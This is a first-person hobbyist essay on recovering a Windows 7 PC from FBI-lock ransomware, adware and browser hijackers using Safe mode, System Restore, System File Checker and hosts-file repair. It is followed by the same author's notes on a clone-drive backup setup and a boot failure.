A comprehensive essay on virus recovery in Windows 7 based on my own hard won experience.

My related essay on Windows 7 is here: XP to Windows 7 'Upgrade', What a Freaking Nightmare
Go to homepage
F8 (Safe mode) --- Power down first (important). With my desktop HP machine F8 does nothing with a 'Restart' boot.
F11 (Recovery menu), F9 (Diagnostics)

Introduction
       This is an essay about how to recover from (Windows) virus attacks. This essay is unusual in that it is not written by some so-called virus expert, but by someone who has been repeatedly attacked by different viruses and recovered every time, and who has written up what worked for him. In 2013 I was attacked by so many different viruses with different levels of sophistication that I learned a bunch of different ways to recover. What worked in the beginning, say for the FBI lock virus, stopped working as the viruses got more sophisticated and began blocking access to Safe Mode and Task Manager. At one point my homepage came under attack, and several times it was flagged by Google ('this site may harm your computer'), but with time I learned how a virus was inserting javascript into my page and closed the door.

(update 8/29/15)
        The burst of virus attacks described in this essay lasted for many months and then just stopped. I'm pretty sure changing my FTP password was the key to protecting my homepage on remote servers, but what exactly stopped the virus attacks on my OS I don't know. Maybe it was related to the FTP password change, or to a change in my Windows installation (with Windows updates shut down), or to something else, but one thing is certain. It is now about two years later and there is no doubt that virus attacks on my OS and homepage are a thing of the past. (And as I always have I don't run an anti-virus program in the background.)

My anti-malware programs and tools

FBI Lock virus recovery
       Overview   .  Details  .   updates

FBI lock variant that disables Safe mode
       Overview  .  Details  .   Recovery using System Restore (update)
      Depending on System Restore (update)

Yield.manager popup ads recovery
        Overview .  Details

Fake Adobe Flash Player Install popup
        Overview  .  Details

Softonic toolbar viruses: 'IB Updater' and 'Incredibar'
    and SweetIM, SweetPacks (redirect) toolbars
        Overview  .   Details

Repair virus damaged files with built-in tool 'System File Checker'
        Overview   .  Details

Boot failure, system crashes
        Overview   .  Details

 Windows repair
        Overview   .  Details

 Windows reinstall and disk options
        Overview   .  Details

Safe mode with no icons
        How to navigate in the 'black' Safe mode screen
Flash cookies
Overview of several virus fixes

Did a trojan virus cause my computer crash?
--------------------------------------------------------
Google warns my (online) home page is infected, and I confirm Google is right (9/22/13)
        My homepage files on my server (Comcast) had been modified. They were no longer the same as on my home machine. I found all the .htm files there with (malicious) javascript code wedged into them. This wedged code causes google to identify my homepage as 'may harm your computer', and I can see from the source code that the wedged code is calling a javascript from various URLs (different each attack) from outside the USA that are identified with viruses. (What this virus code does, I have no idea!)

        This was a three month battle with repeated infections, but eventually I defeated my homepage attacking virus.
        No more homepage infections (12/25/13)
         'This site may harm your computer' (9/22/13)
         My homepage is infected again (and again)! (10/4/13 -  11/5/13)
         Homepage virus attacks defeated (12/25/13)

         How to put up a homepage
--------------------------------------------------------

        I have been hit by a bunch of nasty viruses and popup ads in late 2012 and early 2013 on my Windows 7 desktop with the result that I am now quite good at getting rid of them. I've recovered every time using a bunch of different methods, so I have written up a guide (largely for me) on how to do it. The repeat attacker has been the FBI lock virus (press calls it 'ransom ware') that has hit me well over ten times. I became quite expert in cleaning it off my machine, and in all my most recent attacks have gotten hit by a new and much nastier variant of it that blocks access to Safe mode. After months of virus attacks, I had a system crash and boot failure that I now suspect may have been caused by a trojan virus.

        In this essay I first list the tools I have found most useful, then an overview of the viruses I got hit with and how I removed them, including detailed contemporaneous notes as I worked to remove that virus. I also detail a very useful tool, 'System File Checker', I discovered built into Windows 7 (and Windows 8 too) that can repair virus damage to Windows files. Finally I discuss the evidence that a virus may have crashed and damaged Windows files my hard drive.

System Restore workaround (April 2013)
        After almost six months of battling (mostly) the FBI lock virus, I have become very careful to check daily that Microsoft System Restore always has a few restore points. I check daily because restore points randomly (and frequently) disappear. If I have less than three restore points, I create new ones. To make this process quick and easy I have two shortcuts on my desktop. One just calls Windows System Restore. This allows me to check how many restore points there are. The other shortcut runs a little script I got off the web that makes a new restore point (which I can name) in 30 sec to 1 min. The workaround for this buggy mess is necessary because:

        a) System Restore in Windows 7 is the only reliable way to regain control of your computer when the attack is by some (newer) versions of the FBI lock virus that disable Safe mode. Restore points are essential, if System Restore has no restore points, your best virus fighter is lost, it won't run.

        b) System Restore in Windows 7 is a buggy mess. The bug is that its restore points randomly and frequently disappear. If it has any restore points (hopefully not too old), I find it to be a reliable way to disable the virus and regain control. All System Restore does is delete any .exe files on the hard drive installed since the restore point. This is enough to disable the FBI virus because its executable file is always an .exe file. However System Restore does not clean up all the other stuff the virus sprays into your hard drive and registry. But if you noted the time of the attack and have a good search utility, like Agent Ransack, once you regain control you can track down the virus fragments and delete them. If you haven't installed any new programs since the restore point was established, System Restore won't do anything bad to your machine. If you have, then these recent program(s) will need to resinstalled.

My anti-malware programs and tools
        I don't have any of the standard anti-virus programs (Norton, Kaspersky, McAfee) on my machine. However, I do have the highly regarded free version of Malwarebytes anti-virus installed, and I have come to depend on it. It provides some degree of real time protection, but it is most useful as a clean up tool. Its database updates frequently, and while it may not block a virus file from loading, it does usually log it. With this information not only can the virus files be cleaned off the machine, but the file time of one virus file allows any related virus fragments to be tracked down and deleted.

        (update) While Malwarebytes anti-malware worked reliably for months against the FBI stop virus, detecting nearly every attack, and while I keeps its database updated, I have not found it at all useful in the last few months. The reason is the new, more sophisticated FBI stop virus blocks access to Safe mode and that means there is no way to run it. (I should check their site to see if there is any way to access it via a flash drive during a virus attack, but I doubt it.) After recovering with System Restore, a look at files written just prior to the attack shows that that Malwarebytes is not logging the virus attack as it did previously, so it's probably no longer seeing the virus .exe file download in real time.

Key tools
        Malwarebytes Anti-malware (free version)          --- Anti-virus, virus detection in 3 min scan, real time virus load logging
        Agent Ransack from MythicSoft (free)              --- Search utility, time window searches, displays file times to second
        System File Checker (built into Windows)         --- Microsoft tool, checks and automatically repairs system files
        HijackThis from Trend Micro (free)                  --- Checks 'hosts' file for yield.manager ad corruption in two seconds
        System Restore (built into Windows)                --- Microsoft tool that removes .exe files installed after a 'restore point'
                                                                                               (Powerful tool, but very buggy in Windows 7, restore points
                                                                                                'magically' disappear, so need to be regularly created)

Secondary tools
        HouseCall from Trend Micro (free)                                     --- Anti virus (5 min scan)
        HitmanPro Anti-malware from SurfRight (free)                   --- Anti virus (free version will only detect, not repair)
        Spybot Search and Destroy from Safer-Networking (free)  --- Anti virus (I rarely use this)
        CCleaner from PiriForm (free)                                            --- Cleans up, quickly deletes lots of history and temp files

        I have found Malwarebytes, HitmanPro, and HouseCall each found a tojan that the other two had missed, so to really clean your machine running several anti-malware tools is a good idea.

FBI Lock virus recovery
Another new FBI variant (update Aug 18, 2013)
        After several months with no FBI attacks, I have recently been hit twice with what appears to be a new variant of the FBI virus. The distinguishing feature here is no .exe file can be found. Like the original FBI virus this variant does not block a boot (F8) into Safe mode. However, this time the virus has been modified to hide and prevent the usual recovery tools from finding it. Malwarebytes Anti-Malware is defeated by this variant. A Malwarebytes scan in safe mode just after an attack reports no problems. The casual user dependent on  Malwarebytes is screwed. My search of the last 10 minutes before the attack did not turn up any .exe (virus) file to delete.

        I don't know what would happen if recovery was attempted using only System Recover, which has been the primary means of recovery for the variant that blocks the Safe mode. My understanding is all System Recover does remove recent .exe files. If .exe came in earlier, it would work, but if the .exe is somehow hidden it might not. In this last attack I had only minutes before switched to a new browsing site so my guess is that it was the source of the virus, so there was likely no earlier .exe download.

Virus files
       In the last attack five files jumped out as almost for sure associated with the virus. All had the same random name. There was a pair of short files [1-2 kb, .bat file and .reg (purpose?)] with two copies in different directories and written just 20 seconds before shutdown. And just 10 seconds before shutdown, probably at the time of the attack, there was a huge (92 Mbyte) .pad file with the same random name. I bet if I had just deleted these five files, I could have recovered, but I like to erase as much of the virus as possible.

        The random name .bat file would likely point to other virus files, but when I tried to read it (with Notepad), Windows would report that a file with a different random name could not be opened. Clearly this file was not normal. I later found a 104 kbyte .bfg file with the reported name written one second earlier than the .bat file, but I was unable to delete it (in use OS said). I suspect this is the .exe file with an altered suffix, since it is the right size and clearly has been hidden. I was, however, able to rename it and change its suffix, but still could not delete it. When I recovered, I searched it out and deleted it. Prior to exiting Safe mode I deleted a bunch of other files in the last 30 seconds just to be safe.

---------------------------
       Recover: Use Malwarebytes Anti-Malware or manually search for filed downloaded just prior to the lockup. (This is for the older FBI lock virus that you to regain control via Safe mode. For the newer FBI variant that blocks access to Safe mode, see the next  section.)

       Without warning the FBI Lock virus throws up a fake FBI screen and totally locks up your machine. This is classic ransom ware: 'Send $200 and we will unlock your machine' (then they don't!). According to a Dec 2012 NYT article ransom ware has grown into a major world wide menace with 16 different gangs (apparently mostly in Russia) doing it. I have been hit by this virus repeatedly.

        When FBI screen appears, it is best to power down immediately and note the time. This virus consists of one or two .exe files (generally same file with different names in different locations) plus a few shortcuts pointing to the .exe files. All the virus files will have downloaded just before the machine locked up and will have exactly the same file times.

        To recover power up in Safe Mode (hit F8) and run Malwarebytes Anti-Malware. A time window search centered on the time of the files Malwarebytes finds may find additional pieces of the virus Malwarebytes missed. Manual recovery is possible by searching for files written in the minute or two before the machine locked up. Any .exe files in this time window are likely virus files and deleting them will kill the virus. To find more of the virus search again for other files written at the same time as the .exe files.

FBI lock variant that disables Safe mode (Dec 24, 2012)
        Recovery from this new, nastier more advanced variant of the FBI lock virus is much more difficult than with the 'classic' FBI lock virus. The reason is this variant prevents you rebooting (F8) into Safe mode, so the usual way of regaining control is blocked. I have been hit by this variant only once (no longer true), and I did manage to recover, but the procedure I used was long and winding. I am hoping there is a simpler way.

       Recover: I have come to depend more and more on Microsoft built-in tool, System Restore, to recover. The first time I recovered I used the long sequence of steps here, but below is a summary:

        I booted with Windows recovery disks and ran one of its tools: Startup repair. I found I could then boot (F8) into 'Safe mode with command prompt', where I ran System File Checker. After this, I found Ctrl-Alt-Del interrupt was now working (it had been previously disabled by the virus), so I could get to Task Manager and from there to Explorer with the ability to run anti-malware tools. Next time I would try the following shortcut:

        Try booting (F8) directly into 'Safe mode with command prompt'. It's possible that the virus doesn't block this mode. If this works, then see if Ctrl-Alt-Del will get you to Task Manager, or type 'exit' and then try Ctrl-Alt-Del. If these shortcuts don't work, then the recovery tools (Startup Repair and/or System File Checker) must be doing some good and helping with the recovery.

        Once System Restore saved me from a nasty FBI lock virus that blocked safe mode, I then began to create restore points and monitor them. I had one, two, three, then four restore points. I see the same four points for a while, and then I check again a few days later (system clean during this time), and I find my latest three restore points are gone! I am left with just one created over two weeks ago. On top of that this is Tues and on Sun another restore point should have been created when Windows auto-backup runs. A scan for affected programs with this old backup point tells me that four program updates will be removed replaced by their old versions, which it warns may not run correctly. You've got to keep making and checking restore points to get this buggy, but useful, tool to work. To make this easier I have shortcuts on my desktop to do both jobs.

Check for earlier virus file downloads
        The .exe file of this FBI lock variant can be more difficult to find than is usually the case. The reason is that with this variant all the virus files may not download at the same time. I found (using the MalwareBytes log) that my virus .exe file had downloaded 19 minutes before the machine locked up when the rest of the virus files came in, so check the MalwareBytes log to see if it caught any earlier file downloads.

Recovery using System Restore (update 12/31/12) (update 1/20/12)
        I got hit again, several times, by a variant of the FBI lock virus that disables Safe mode and each time I was able to recover using System Restore. The first time it didn't work cleanly (in subsequent attacks it was clean), but it did restore my machine to normal operation without affecting my files. This was a new variant of the FBI lock virus I had not seen before. Its lock screen says, "Internet Crime Complaint Center", and it very effectively blocked access to Safe mode. I tried my idea of booting into 'Safe Mode with Command Prompt' to see if I could get from there to Task Manager using Ctrl-Alt-Del interrupt, but it didn't work. Unlike before, Ctrl-Alt-Del worked, but Task Manger was missing from the list of options.

        I tried to get from the Safe mode select screen to Safe Mode (don't know if by design this is possible), but couldn't do it, so I booted into the HP Recovery screen with F11. I had several restore points within last two days (I have been creating them with shortcut on my desktop) and chose one from day before, when anti-malware had reported a clean system. I had earlier in the day tried System Restore when my system was clean and it had rolled back OK. But this time System Restore, as it had done with my system crash week earlier, threw an error message that it was not successful, telling me had failed due an error and had not changed any system files (below left). I just closed the message box hoping the error was bogus and it was! The system automatically restarted and up came my normal desktop with a new message that System Restore had successfully restored my system to an earlier time. Ah, yes Microsoft in action...

Depending on System Restore (1/20/13)
       My latest experience with the FBI lock virus is that it has mutated. All my recent FBI attacks have been the variant that blocks access to Safe mode. So with this more difficult version, my principle means of recovery, after verifying that a Safe mode boot (F8) does not provide access to recovery tools, is to go straight into (F11) System Restore. Three or (four) times now this has saved me, removing the virus .exe file (or files) and restoring my normal desktop. A System Restore virus recovery does leave behind some virus files (lock screen and html files pulling it together), but with the virus .exe files removed, they are harmless.

        Since System Restore in Windows 7 is buggy, I am now careful to monitor that I have restore points, because they have a way of magically disappearing, and if you have no restore points when the virus hits you are sunk! To speed this I have a shortcut on my desktop to open System Restore (to check for restore points), and another shortcut allows me quickly to create a restore point. The code for the script to create a restore point is online ( search: 'CreateRestorePoint. vbs'), and I can verify these restore points are as good as any and will work.

System Restore 'affected files'
       Before running System Restore I asked it to check for 'affected files'. As I understand now how I think System Restore works, it should have identified any .exe file that it was about to (effectively) delete. The only .exe file installed post the restore point the previous day would be the virus .exe. Yet here is where it gets peculiar, System Restore reported no files would be affected by the roll back. This is obviously wrong. System has no way of knowing that the .exe virus file was not installed my me.

        The only thing I can think of is that System Restore only checks file times in the two main Program file directories. And in my experience while the virus. exe file is out there in the open, it is in an unusual place for a .exe file running out of the c:\user directory.

        Well, after playing around with System Restore a little more, I have another thought. I suspect all it does in its scan is look at the list of installed programs that Windows keeps and check these dates. I ran a test making a dummy .exe file in c:\temp, and it was not found. If I am right that it looks at only the list of installed programs, then it is never going to see a virus file.

        First thing I did was to run Malwarebytes anti-malware on the restored machine, and it finds nothing. I then search with Agent Ransack for files written in last few minutes looking for virus files. On a quick look I don't see any, which would be consistent with the Malwarebytes report. The time search window has no .exe file nor any Malwarebytes log entry that would allow me to look for an .exe download at an earlier time. But I do notice a small image file (img[1].png) written in the final seconds preceding lock. I look at it with my photo viewer and find it is a small part of the lock screen (my URL). Notepad shows the three small .htm files (with names like 'index.htm' and 'mp.htm') are more virus fragments that are assembling the lock screen.

Hiding virus files with earlier file times?
       In all my months of chasing down virus files I have never found the main image files that make up the lock screen. In this case the .htm files gave the names of the called images (names like 'bg.jpg' and 'mp.png'), so I searched for them. And son of gun the results were interesting. I found the lock image pieces had file times that were months earlier (and all different). No wonder that my time sensitive virus file searches around the time of lockup never found them. It seems like putting 'wrong' times on files is a way of hiding them, but I don't see how this does much good when it is only the lock screen. (Maybe being saved for a future attack?).

        The reason I am nearly positive the lock screen files (.htm and image) has just been downloaded is that while I was trying various recovery techniques (before System Restore) the FBI lock screen had popped up several times. I found four different subdirectories (5-10 minutes apart) with the same lock image files. And this is the first attack that I had ever seen this particular lock screen. The image subdirectories were located here:

        c:\user\windows_7\Appdata\local\temp\7540.tmp (example)\(htm files here)\img\(image files here)

        I manually cleaned out all the support virus fragments. While the .exe virus file was missing, I think I know its name, because there was .pf (prefetch) file, which in the past I have seen encode the virus .exe filename and was here named SPGNKY5.exe (random).pf. It has one Google hit as a suspicious element.

Take computer offline?
       So it sure looks like (with this variant anyway) every time the FBI lock screen pops up it screen files have just been download from the internet. Some people online had claimed that taking your machine offline (say, remove power to cable modem) might aid in recovering. My findings indicate this might be worth a try. However, I will be surprised if it works because 1) Once you see the virus lock screen a copy of the screen files is already on your hard drive, and 2) It's quite unlikely that just killing the lock screen would reenable the keyboard or mouse.

Tried it (twice) -- doesn't work (1/20/13 update)
        On a subsequent FBI lock attack I tried this method, taking the computer offline, and it didn't work. When the FBI lock screen popped up, the first thing I did was power down my cable modem. But when I powered down then up, the compter was still locked and FBI lock screen still popped up. This virus recovery method doesn't work (at least with the latest varient of the FBI lock virus that also disables Safe mode).

        Microsoft has a page called 'What type of files does System Restore change'? that gives this non-technical explanation (below). Note this explanation says nothing about .html files, which are sort of a developer file, but also sort of an executable file as far as a browser is concerned. My experience is that .html files are not changed. I found a forum discussion confirming this, saying that System Restore changes .exe files but not .html files.

        "System Restore can make changes to Windows system files, registry settings, and programs installed on your computer. It also can make changes to scripts, batch files, and other types of executable files on your computer.  Personal files, such as documents, email, photos, and music files, are not changed.

        For example, if you download a personal file, such as a photo from a digital camera, on a Friday and then restore your computer to the state it was in two days earlier on Wednesday, the photo will still be on your computer. However, if you install a photo viewing program on a Friday and then restore your computer to the state it was in two days earlier on Wednesday, System Restore will uninstall the program, and you won't be able to use that program to view photos."

Yield.manager popup ads recovery
        Recover: Most anti-malware software can't touch the yield.manager family of aggressive popup ads. The key to getting rid of these popup ads it to fix the (hidden) system 'hosts' file that the virus has changed.

                    c:\windows\system32\drivers\etc\hosts                   (no extension)

        This text file is part of the 'Domain Name' system, and lines added to it by the virus causes the browser to redirect to sites listed to pull the ad contents. The virus adds a handful of lines far down at the end that need to be deleted. The editing is easy using Notepad, but getting Windows to allow you to overwrite the corrupted file is tricky, because the virus has also tightened the file's permissions. I read online that running Notepad editor 'as administrator' will do the trick, but in my experience (and the experience of others) this may not be enough, it is also necessary to follow a procedure to open the file's properties and loosen its permissions, as shown below:

            1) Change 'hosts' file properties first
                         Properties, Security ("Authenticated Users), Edit, Full Control, Apply, then unclick Read-only
            2) Notepad (Run as Administrator) can now overwrite 'hosts'
            3) May need to save file as "hosts" (with quotes)                           (so it won't save as 'hosts.txt')

        An attack by Yield.manager virus causes a blizzard of popup ads that overwrite part of the screen (usually the lower left corner). These are not standard popups that the browser can control these popup are due to changes to the page code made by a virus. Closing one popup just causes a new one to appear in a few seonds to minutes, so browsing is crippled. This virus infection is known to be a very difficult to get rid of, most anti-malware tools can't touch it including my number one anti-malware tool, Malwarebytes Anti-Malware.

Partial fix -- block sites
       Popup ads can be tamed by having your browser block the handful of sites from which the ads are pulled. This is pretty easy to do, you just right click popups to find its source http address and add it to the browser Block list. On some sites a blocked popup ad window will remains transparent, so most of the problem is gone since only the tiny frame close 'x' appears on screen. However, on other sites the window goes opaque so little is gained.

Fake Adobe Flash Player Install popup
        This virus agressively and repeatedly throws up an Adobe Flash Install window that is a fake. Malwarebytes Anti-malware identifies the source of this infection as a pair of trojans:

                        'Rootkit.0Access'
                        'Trojan.Dropper.BCMinor'

        I read this virus causes brower redirects, and I know how it does it. I found that my 'hosts' file was modified (with added redirect lines) at exactly the same time as the virus files downloaded.

        Recover: Malwarebytes Anti-malware found and identified this virus, but it had difficulty dealing with it (in normal mode). Using location information from Malwarebytes I tracked down the files it identified and also found two recently installed subdirectories (called 'U' and 'L') with the same time stamp and suspicous looking contents and deleted them all. I got into Safe mode and again ran Malwarebytes, which now reported I was clean. I have seen no problems since.

Softonic toolbar viruses: 'IB Updater' and 'Incredibar'
        In downloading and trying various anti-maleware I somehow picked up a piece of malware that attacked (simultaneously) several of my browsers (Mozilla and Chrome) corrupting them with aggressive, redirecting, toolbars identified as 'IB Updater' and 'Incredibar'.

        Recover: Mozilla browser itself soon recognized the attack, saying a side-loaded program had made it unstable and requested that the newly installed toolbar be disabled. I was able to disable the new toolbar in Chrome too, but to locate and delete this virus I needed anti-maleware. Anti-malware HitmanPro worked here. It detected Softonic on my machine, which a web search identifed as the source of the toolbar infections. Cleanup was a simple search and delete for filenames including 'softronic'.

SweetIM and SweetPacks (redirect) toolbars (update 3/31/13)
        In March 2013 got hit with a single massive attack of (redirecting to ads) browser toolbars that auto installed. It infected 4 of my 5 browsers: Chrome, Firefox, IE, and Safari, but Opera, my main browser, was totally unaffected, maybe because this is the browser I was using during the attack. Files associated with the infecting toolbars I later found to be identified as: SweetIM, SweetPacks, and xxxx Caddy.

        The attack began with some messages flashing on screen for less than one second, then a few seconds later up came a curious (almost for sure, fake) message that Windows has encountered a problem and will close in one minute so save your work now. And in fact in a minute or so Windows did close and began to reset at which point I powered down (five minutes). The reset was probably needed for the files to fully install, nevertheless when I powered up, I was getting redirected.

        Infection symptom: When a link in an infected browser is clicked, instead you are redirected to an ad site in a new window. Closing the window does get you to the link you want, so your system, while infected and impaired, is at least still functional.

        Recover: I powered up in (F8) safe mode and ran Malwarebytes, and it found a couple of trojans, but deleting them did not fix the problem. Turns out this attack had installed dozens of files and dozens of registry entries.

        The key recovery tool here I found was HitManPro Anti-malware, which I then followed up by a massive file search and deletion using Agent Ransack.  HitManPro found a couple of trojans whose file time was about 3 minutes before Windows went down. This turned out to be the key. Because of the delay I had missed them in my first Agent Ransack search. Now I knew where to look and as usual first deleted the (one or two) .exe files, but still the redirects continued. I later went in and took out nearly all the files that came in that three minute windows (dozens, many including SweetIM and SweetPacks in the name). These were the toolbar files and deleting them got rid of most of the problems. HijackThis hinted that there were registry entries with these names, and sure enough a search of the registry for these filename fragments found dozens, all of which I deleted. All the redirects have stopped, and I think the system is now clean.

Repair virus damaged files with built-in tool 'System File Checker'
        Recover: Did you know the window's operating system has a (built-in) program than both checks and repairs damaged Windows system files. I didn't. It's Microsoft 'System File Checker' (sfc.exe) that run 'as admistrator' in a dos like comand window [sfc /scannow] can in ten minutes painlessly fix many operating system problems.

        In hassling with viruses key system files can get inadvertently damaged. At one point I had two key system virus fighting tools stop working, and no one online seemed to know how to fix them. My Safe mode became barely usable when all its icons disappeared leaving just a black screen with Safe Mode in the four corners. My other problem was Regedit, the Windows registry editor, would not open. I eventually found a single fix for both of these problems: Microsoft's System File Checker (sfc.exe). Running it once fixed both problems.

Windows Startup Repair is (probably) calling SFC (update 3/13)
        Windows has a built-in utility called 'Startup Repair'. It is one of the tools on the Windows 7 backup disk. If Windows can't start, this utility may automatically popup and run. Look at what Startup Repair says it does: "repairs Windows 7 by replacing important operating system files that might be damaged or missing".  Sound familiar? I have not seen this written anywhere, but I think it is a very good bet that 'Startup Repair' is calling 'System File Checker' the actual command level program that is checking and replacing windows files! (Repair might also call some other programs too, as it claims to fix the registry.)

        I never realized until recently that 'System File Checker' and 'Windows Startup Repair' are (very likely) the same repair utility. 'Windows Startup Repair' just provides Windows' access to the command level utility, SFC', which if Windows is running normally (or maybe Safe mode) can be accessed directly via a command box. (I have seen dozens of articles on Startup Repair and no one ever mentions or explains this!)

        Once started you find you can't cancel out of Windows Startup Repair, and (very frustratingly) it provides no hint as to how long it will take to complete, which I recently found is something like 15 to 30 min consistent with running SFC. The only diagnostics it provides when it finishes is a windows saying it either 'was' or 'was not' able to repair windows. I suspect strongly this is very deceptive. SFC might fix a bunch of files, but if there is just one it can't fix, it reports it couldn't fix all files. I bet Windows Startup Repair would then report it couldn't repair Windows, but there is still a good chance that it has fixed a lot of files and maybe Windows will start.

        This is now the case on my machine. When I first ran SFC, it always reported all files fixed, but no more. There is apparently one non-critical file it now can't fix, so it now always reports it could fix all files and to consult its (cryptic) log. When recently during a virus recovery Windows wouldn't start and Startup Repair auto-ran, it reported it couldn't fix Windows. But right after Windows did in fact start, so running Windows Startup Repair (SFC) probably did fix one or more critical files damaged by the virus or virus recovery.
---------------------------
Tip
        Very quick 'hosts' file check: Open HijackThis, hit scan --- This scan takes all of one second. Normally the 'hosts' file can be both read and written, so if HijackThis warns it had trouble writing the file, it means some virus has messed with it.

References
        This posting on Malwarebytes forum warns of computers infected with backdoor trojans that don't leave any tracks and can allow crooks to upload stuff from your machine. At the end are lots of links to virus articles

         http://forums.malwarebytes.org/index.php?showtopic=113370

Good info on the 'hosts' file

         http://winhelp2002.mvps.org/hosts.htm

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Introduction
       After a failed Windows installation repair, a failed image backup, and then a month of drudgery reinstalling Window 7 plus all my programs, I decided no more. I don't want to do this again!

        After doing some reading I decided that cloning, an approach often used by the pros, was the way to go. When I saw references to clone drives, however, they would usually speak of physically swapping in the clone for the main hard drive. Swapping cables may be easy for pros with an open computers on a lab bench in good light, but it is a different thing entirely in a home setup. My computer sits on the floor in a tangle of cable, jammed in between stuff in dim light.  In the 2 or 3 years I owned it, it had never been opened. I didn't want to have to open it if the main drive was failing to swap cables. I wanted to have a way to switch between my main drive and clone drive without opening the case.

        Never did find a good reference on how to do what I wanted to do even though I did a lot of reading. But with a lot of testing, a lot of trial and error, going down and backing out of blind alleys, I made progress. Acquiring and evaluating tools and ordering parts took a lot of time. In the end I ended up with a clean simple clone backup system that does just what I wanted it to do.

My clone backup system (4/15/14)
        I've got cloning set up working to protect my computer. While I went down a lot of blind alleys trying to figuring it out, the final result is simple and operates slick. It's not a raid setup, I don't want a real time 'mirror' image. I am using clone software to periodically copy my main hard drive to the clone drive and make it bootable. Cloning takes only 20 min (in background) for 50 Gbytes. My computer can boot and run from either drive with all programs, data, and setting intact. With case closed I will be able to switch between the drives in two ways:

        1) Dual boot --- built into Windows 7, boot pauses for a few seconds allowing clone drive to be selected
        2) Power switches for individual drives mounted on a rear bracket. (Found on Ebay.)

Setting up a clone backup system
       Took me a long time to figure out how to set it up, evaluate tools, etc, but the final result is simple. Here are the steps:

    * Buy an internal (sata) drive the same size or larger than existing internal drive

    * (optional) Buy sata-to-USB drive kit ($20). This provides a power supply brick for the hard drive, plus cables. This allows the hard drive in beginning to just sit outside case powered by brick and provides a long sata cable to plug it into motherboard. Found my desktop HP motherboard had five sata (standard drive serial link) connectors, three of which were free.

     * Download free (or trial) clone software and use it to format and clone the main drive to the new drive. After testing several I like Casper 8, which at end of 30 day free trial I will buy for $50.

     * Download EasyBCD to help set up dual boot. Dual boot is native to Windows 7, but free utility EasyBCD makes setting it up much easier than trying to use the techy Windows commands.

       The outside mount choice is an enclosure for a sata (internal) drive that has a 'esata' connector. Esata is the internal sata bus of the motherboard brought to the outside, sometimes with no buffering. From a signal integrity point of view this gives me the willies. Inside sata cables are two transmission lines operated at Ghz clock rates. When sata bus is fed out the back of PC and through a similar connector on drive enclosure you have not only lengthened the signal path, but added two connectors into the path. Still I see 'esata' ports appearing on new computers and cable up to 6' for it being sold, so it must work.

        I am probably going to try both approaches, maybe I'll have one clone inside and another outside as internal drives are cheap. I have ordered an esata enclosure but it has not yet arrived. Data integrity issues aside, I am positive the dual boot setup will work over esata, because the motherboard can't tell the difference. (At least this is the case when a motherboard sata port is fed out the back without buffering, there might be an issue if a sata card is used in the PC.)

        Another option may be USB 3, which my new enclosure also will have. I suspect that booting Windows 7 from USB drive, which it does not natively support, can be done, but in my earlier testing I didn't know enough to get it to work.

Boot failure, system crashes (2/24/14) (3/5/14)
        Without (much) warning on a routine Restart my computer refused to boot. After about two hours and dozens of power down reboots, I finally got it to successfully boot, and in the process I learned a few things. However, I was not out of the woods, clearly my machine was unstable because in the next couple of weeks I had several surprise crashes (blue screen of death with auto-reboot). There was no indication that the cause of this was a virus. I had had no virus attacks in many months. It didn't come on suddenly, and none of my many virus scanners ever found anything.

History prior to boot crash
       Prior to the crash for the last couple of months or so my computer had been a little wonky, but still usable. The main weirdness was a strange delay of several minutes after boot before some programs would run, but after this delay it would run pretty well. Chrome browser would always run quickly, but other browsers, photo display programs, even Microsoft utilities like Recycle bin or System Restore would not open for a few minutes when clicked. When I would open device manager, there they would be (running), so I would have to click and 'end process' to clear the decks. But in a few minutes the delayed programs would suddenly open. It was like something was running, but I couldn't figure out what. Rkill always reported nothing running, and scan utilities found nothing. I have not a had a virus attack in months.

        There were other weirdnesses too. When I requested a Power Down (or Restart) the system would often hang while exiting. It would just sit(for minutes) waiting for (non existent) programs to close, forcing me to hold the power button down. And my favorite video player KMPlayer had problems. It played most files OK, but when I clicked to open certain (recorded) files it would massively crash KMPlayer to the extent that I often couldn't get to system manager (using Ctrl Alt Del interrupt) to shut it down.

USB drive problem?
       There are also hints that one of my two backup USB drives (2 Tbyte #2) may be causing trouble. While files on it are generally accessible, Disk Check on it will not run to completion. Also on powerup I occassionally see an auto-run window for this drive pop up, which it should not. I have yet to address this issue. It's my 2nd backup drive, so I should probably take it off line, clean it (reformat it?) and then recopy stuff from backup #1 to it.

Boot details
Symptoms
        Windows would begin the boot process (spinning logo comes up) but would soon drop me into a text box with two options: Start Windows Repair (Recommended) or Start Windows normally. The 2nd choice (Restart Windows normally) would always fail and just return me to this same screen.

        As a first step  I unplugged all USB devices (including two USB hard drives, USB TV tuner and USB scanner) and left them unplugged while I worked the problem. I have seen in the past that a bad USB device, usually a USB hard drives could cause boot failure. Didn't fix the boot problem this time.

        The 1st choice would show 'loading files' and then in a couple of seconds bring up a (blank) 'sunrise' graphic with no text of any kind. I waited 5 to 10 minutes a few times and nothing ever changed, just this blank hires screen sometimes with a cursor. This was Windows screen I don't ever remember seeing before. The only way to exit the sunrise screen was hold down the power button, wherein the process repeated and I ended up back at this screen again. After repeated attempts, I was getting nowhere. It sure acted a hang at the sunrise scree with no way to get to the Recovery utilities. (Ctrl Alt Del did nothing)

        However, I later suspect that Windows Repair might have been running in this 'sunrise' screen without giving any indication it was running or that anything at all was happening. (Typical Microsoft!)

Progress -- Windows Recovery Disk
        Doing a little research with my tablet found mention of using Windows Recovery Disk to access Windows Recovery menu. I had made such a disk 15 months ago and it was leaning up against my desktop machine. Rebooted with the recovery disk in the DVD drive, and this got me to the Windows Recovery menu.

        But I was dismayed to see System Restore, which I was thought might save me was blanked out. I have diligent for the last year at every boot to make sure I always had several restore points, adding new ones when good old Window7 deleted them, but here just when I might need it, it looked like I probably had no restore points! (yup, when I recovered I found no restore points, and I know I had had several only the previous day. So the latest, failed, boot attempt must have wiped them out! While this utility has saved from many viruses, it has a distressing tendency to fail just when you need it.)

        I ran the windows diagnostic (again) from the Windows Recovery menu and this time it now (twice) reported a disk failure, whereas a few minutes earlier the hard drives had passed all its tests. (another bogus report?)

More Progress
        I finally got on the road to recovery running Startup Repair from the Windows Recovery menu accessed via the Windows Recovery Disk. This time instead of a blank 'sunrise' screen I got a normal Startup Repair box with a moving activity bar and a little bit of diagnostics.

